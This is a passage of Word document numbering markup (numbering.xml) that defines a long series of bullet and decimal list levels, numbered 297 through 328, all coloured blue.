      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21939">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21940">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21941">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21942">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21943">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21944">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21945">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21946">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21947">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21948">
    <w:lvl>
      <w:start w:val="297"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21949">
    <w:lvl>
      <w:start w:val="298"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21950">
    <w:lvl>
      <w:start w:val="299"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21951">
    <w:lvl>
      <w:start w:val="300"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21952">
    <w:lvl>
      <w:start w:val="301"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21953">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21954">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21955">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21956">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21957">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21958">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21959">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21960">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21961">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21962">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21963">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21964">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21965">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21966">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21967">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21968">
    <w:lvl>
      <w:start w:val="302"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21969">
    <w:lvl>
      <w:start w:val="303"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21970">
    <w:lvl>
      <w:start w:val="304"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21971">
    <w:lvl>
      <w:start w:val="305"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21972">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21973">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21974">
    <w:lvl>
      <w:start w:val="306"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21975">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21976">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21977">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21978">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21979">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21980">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21981">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21982">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21983">
    <w:lvl>
      <w:start w:val="307"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21984">
    <w:lvl>
      <w:start w:val="308"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21985">
    <w:lvl>
      <w:start w:val="309"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21986">
    <w:lvl>
      <w:start w:val="310"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21987">
    <w:lvl>
      <w:start w:val="311"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21988">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21989">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21990">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21991">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21992">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21993">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21994">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21995">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21996">
    <w:lvl>
      <w:start w:val="312"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21997">
    <w:lvl>
      <w:start w:val="313"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21998">
    <w:lvl>
      <w:start w:val="314"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21999">
    <w:lvl>
      <w:start w:val="315"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22000">
    <w:lvl>
      <w:start w:val="316"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22001">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22002">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22003">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22004">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22005">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22006">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22007">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22008">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22009">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22010">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22011">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22012">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22013">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22014">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22015">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22016">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22017">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22018">
    <w:lvl>
      <w:start w:val="317"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22019">
    <w:lvl>
      <w:start w:val="318"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22020">
    <w:lvl>
      <w:start w:val="319"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22021">
    <w:lvl>
      <w:start w:val="320"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22022">
    <w:lvl>
      <w:start w:val="321"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22023">
    <w:lvl>
      <w:start w:val="322"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22024">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22025">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22026">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22027">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22028">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22029">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22030">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22031">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22032">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22033">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22034">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22035">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22036">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22037">
    <w:lvl>
      <w:start w:val="323"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22038">
    <w:lvl>
      <w:start w:val="324"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22039">
    <w:lvl>
      <w:start w:val="325"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22040">
    <w:lvl>
      <w:start w:val="326"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22041">
    <w:lvl>
      <w:start w:val="327"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22042">
    <w:lvl>
      <w:start w:val="328"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22043">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
